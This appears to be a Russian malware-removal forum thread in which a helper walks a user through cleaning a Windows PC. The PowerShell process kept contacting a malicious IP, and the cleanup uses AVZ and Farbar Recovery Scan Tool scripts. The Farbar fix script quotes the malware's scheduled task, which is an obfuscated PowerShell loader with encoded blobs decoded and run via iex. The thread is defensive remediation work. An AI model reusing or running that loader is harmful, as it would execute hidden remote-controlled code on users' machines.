[РЕШЕНО] PowerShell создает запрос на переход на вредоносный сайт каждые 20 минут

[Gectar 0]

Привет.
Kaspersky Anti-Virus каждые 20 минут фиксирует попытку PowerShell перейти на вредоносный сайт

Событие: Переход остановлен
Пользователь: DESKTOP-HKUMLCG\gecta
Тип пользователя: Активный пользователь
Имя программы: powershell.exe
Путь к программе: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Веб-Антивирус
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: 66.248.206.176
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: update.php?i=bpj2fVZ_1380
Путь к объекту: http://google.ru
Причина: Kaspersky Security Network
Дата выпуска баз: Сегодня, 27.11.2021 8:05:00

Сканирование с помощью Kaspersky Anti-Virus и Kaspersky Virus Removal Tool ничего не обнаружило.

Помогите пожалуйста решить проблему!

Лог после работы AutoLogger прилагаю 

CollectionLog-2021.11.27-11.27.zip

[thyrex 1302]

Выполните скрипт в AVZ из папки Autologger

begin
 DeleteSchedulerTask('Microsoft\Windows\MUI\498705764');
ExecuteSysClean;
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

[Gectar 0]

Скрипт выполнил.
Новые логиCollectionLog-2021.11.27-14.56.zip

[thyrex 1302]

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

[Gectar 0]

Выполнил.
FRST_result.zip

[thyrex 1302]

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-2567911441-1973401767-2299833061-1001\...\Run: [GalaxyClient] => [X]
Task: {75435327-F07A-4166-968E-E7D8D5A61A8D} - System32\Tasks\Microsoft\Windows\BitLocker\BitLocker => powershell.exe -c "$ddd = 'v1iYAd9OxUL9VdYvwVXAQLo5oxGeOagY7xH/Xaksn3GeB5YN0hXlLNxN30TSUsZz82TXAcNEgSKhO50DoTClbId+k3L6T7NHyEDLQI811VTSDvJcxRX4d6wjiRWMFfUsyRWOKt0V+TX9CP560DzHVtRayF++MZkLlRSRAcoqoDCaVaUzkXPueoVM0necLapynUz+EfMMixatXsVL6VTEV9gWixH/KrdUgki5HPRt8DGPcOUi/gHmFeNgjCPVBpsEjwKrJ9sT7lbDRalk/nqcVdoViTu+bcYS7n2QesAzjyW/EvUZxUaCSrht72PAUM1RwQP+K6VL1AWcTbxw9ADUV/4R7xD8JOlnnSXVEscMmQSwK/JuwlbSUoUt2HuGHpsSnF2gJa4Q83+qYo5yySrIFPQAlgXYTJFt7BzKQddbzAS7UPUDhAOVXtFNqSOOdu8R9jfqBuJmijbVEokY0iD1d/tYyFXJWZtmyGCaDZ8NwCmzNsYw+XOMV5JSkXqzSa9A2ErUDdQqrQbOFddK1hi5KrcZlk6jGfZ22lSZYKpd9QCvVLYx0WXVE8tVuwLkLvtc1UHJWsgu1n2GAZMVhSCrP8Uv/WqBboh63yqgROwDxTmDEI1h9Vb4eNBf2xjGObYRkhXQK/Vj8xinPrAC9BDhA64wnSnbO5cJiA/NOZNO0kuObIVi73y1UsQlwii+bNlLtTvBOJRx1zroUaZElAfQV9Zzv1vPCIAcgRP0bq5LjQOUA/15oxqQL7dStRHkRb1+3H+VXdgAiBPgOYYSn0/MGIFtqjqYAI5fgT2+dspZuGDVWK5ujGr+DagnnRbeM5pqyVTUVthN2y2hOc8ClQeMFbAm5hTTP64CtSTjC+l0uWuFD6gNmA7iZspJhgHAVoRw/i/MGtA1m2XoXo8H8mbVJ4h2xDrpE/ZU3BDeI5p8yVTWU9JQ3BWzKrdUkwLFVOpx916pcOsE7hbMCOJmw3eXSKEBkhPNJ8pZmwjIUsgwqybBE5sYgXTnO5pf+HeLI9VMrGfoFOME1iGfColt6UX4GYd43R/2Qe0DlVDMI+xw7h6dLKIe/hKiCORpnX2FQKkRjxP1bod09Av1Q5pm+nm6DZ8EjXKyO5oR7DyvZolFmm3rD+ganTGEFppp9hmMCpQQ/RX6Z9gftQicWLErrlDSIOsUsEf6Xu92knGaD9hBxxr5ZYEdlkvJQ8gn6T2TDYYJnH2+bdU5z2ubd5h60Ur+GPJHvQyTC5th9Vb4GYdr+zajLcsVhDWMAvFs4FjedqNLvwSyT6JxxTqDTokYkA7kK4sdmQmUHsFYq0nTTJFd2DvzecBG/TLFZow3zjfgROlU0AuVHN8s6WqUfpQe01DUdvhdoxKKGfZl+hWWd+8Z/U2rBqYunW/RV9MT2B+tIYsGk2vDQMVM+X6NC4pAu3npa40PskaAcZh2m3f1B6gkjRaVHNcs70PQRpEa3SuqXqArggOeLbx6rlnUR+Yf6ACnTr1qnjbVGNMT2AitIZkfxkDKRI14v3vVSs9ClX3/c5sH53eQaolq23GmROlHixeSF4t68l/CC40SjyvIev8ElQvWPfl27y3APscZ9U26V7Yz1D7VD9QkmQn3d8EUkh6CRZs+/3GLSNY7u3npa40PskaNe4k5unD4D+IAlgWtXsVdz3edDfpb2zLid+kD2EKXWbEir1STL6hG8BC6HvRInyaWQtNT2BXjPvJIyUz7DdJG6HeJGJskiXT7TJwQ9XyPK6ZUkHDtBfQdpVjKMJBK+kLAFYlt2wLybetY1BSLWbE5owLHX9kJ6BHqCqhNnWrfN58KrgLhdsxOz3icDatx/nWcDdZEiWSxPc4ToTDDJ49k1iW/EqgolA6fE7597173RtlX3RX4d7FUlgeUA/05owLUUfkV6SToAuh3xTqEAcFMjkngccZFwhiCR9Mn6TqvDYoyjXPqcIYR+TrBf7JiizPVFeoFww==';iex('$d=([regex]::Matches(''==QKpcSKkRCKn5WayR3UnsyJ0V2RugjRUVlO601ZulGZvNmbF5Cd4VGVu0WZ0NXeTt1JogXZphCI4VWa7kiclJWb15GbhlmclNlLqJ2bkAyKgcCInAyKgwWZk9WTuomYvRCKgkSKkRGZkgyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WoAyYlRGI9ACZksjclJWb15GbhlmclNFIswWZk9WTgQ3YlxWZzBCfg03JwUkVJJFRMF0QJNVWIBFXuwFXnAScl1CIElUZjlmdlRkLfRyegUmclh2dgwHIlZXayR2azlGZfJzMul2dgkWb3dGI9Aiai9GJ9tjYjRCIuJXd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvhnYtASKyUTMgI3bi1CIzRCIk5WYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVGd5JEdldkL4YEVVpjOddmbpR2bj5WRuQHelRlLtVGdzl3UbBSPgIGcksXKzNXYwRSXn5WayR3cbBCLiNGJd11WlRXeitFKjVGZg42bpR3YuVnZ'',''.'',''RightToLeft'') | ForEach {$_.value}) -jo'+'in '''';$d=[Text.Encoding]::UTF'+2*2*2+'.GetString([Convert]::Fro'+'mB'+'ase'+8*8+'String($d));$d|i'+'ex;')" -c "$ddd = 'v1iYAd9OxUL9VdYvwVXAQLo5oxGeOagY7xH/Xaksn3GeB5YN0hXlLNxN30TSUsZz82TXAcNEgSKhO50DoTClbId+k3L6T7NHyEDLQI811VTSDvJcxRX4d6wjiRWMFfUsyRWOKt0V+TX9CP560DzHVtRayF++MZkLlRSRAcoqoDCaVaUzkXPueoVM0necLapynUz+EfMMixatXsVL6VTEV9gWixH/KrdUgki5HPRt8DGPcOUi/gHmFeNgjCPVBpsEjwKrJ9sT7lbDRalk/nqcVdoViTu+bcYS (запись имеет ещё 2572 символов). (Нет файла)
Edge Extension: (Нет имени) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [не найдено]
Edge Extension: (Нет имени) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [не найдено]
Edge Extension: (Нет имени) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [не найдено]
Edge Extension: (Нет имени) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [не найдено]
2021-11-08 16:05 - 2021-11-08 16:05 - 000659456 _____ C:\ProgramData\i7Nh5H9k7J8ht.tmp
2021-11-08 16:05 - 2021-11-08 16:05 - 000000071 _____ C:\ProgramData\iGytjjY67i.tmp
FirewallRules: [{385EB914-AAF7-4DC9-A5C7-6B7593642F46}] => (Allow) C:\ProgramData\Windows\Profile\dllhostn.exe (WaspAce Service -> WaspAce) [Файл не подписан]
FirewallRules: [{1DF98F60-D726-47D3-BE65-2EE89CF3FBC2}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe (WaspAce Service -> WaspAce) [Файл не подписан]
FirewallRules: [{177DFCA7-D9EC-4BD6-9B58-534824AC1D68}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe (WaspAce) [Файл не подписан]
C:\ProgramData\Windows\Profile
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

• Обратите внимание: будет выполнена перезагрузка компьютера.

[Gectar 0]

Fixlog.txt

[thyrex 1302]

Проблема решена?

[Gectar 0]

Привет. 
Вроде да. Пока что новых попыток перехода не было.
Спасибо за помощь. 

[thyrex 1302]

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10);
• Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
• Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
• Прикрепите этот файл в своем следующем сообщении.

 

[Gectar 0]

SecurityCheck.txt

[thyrex 1302]

Цитата

------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 5.71 (64-разрядная) v.5.71.0 Внимание! Скачать обновления
-------------------------- [ IMAndCollaborate ] ---------------------------
Discord v.0.0.309 Внимание! Скачать обновления
Telegram Desktop version 2.7.1 v.2.7.1 Внимание! Скачать обновления

обновите указанные программы, и на этом закончим
 

[Gectar 0]

Выполнил рекомендации.
Ещё раз спасибо за помощь.

[thyrex 1302]

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".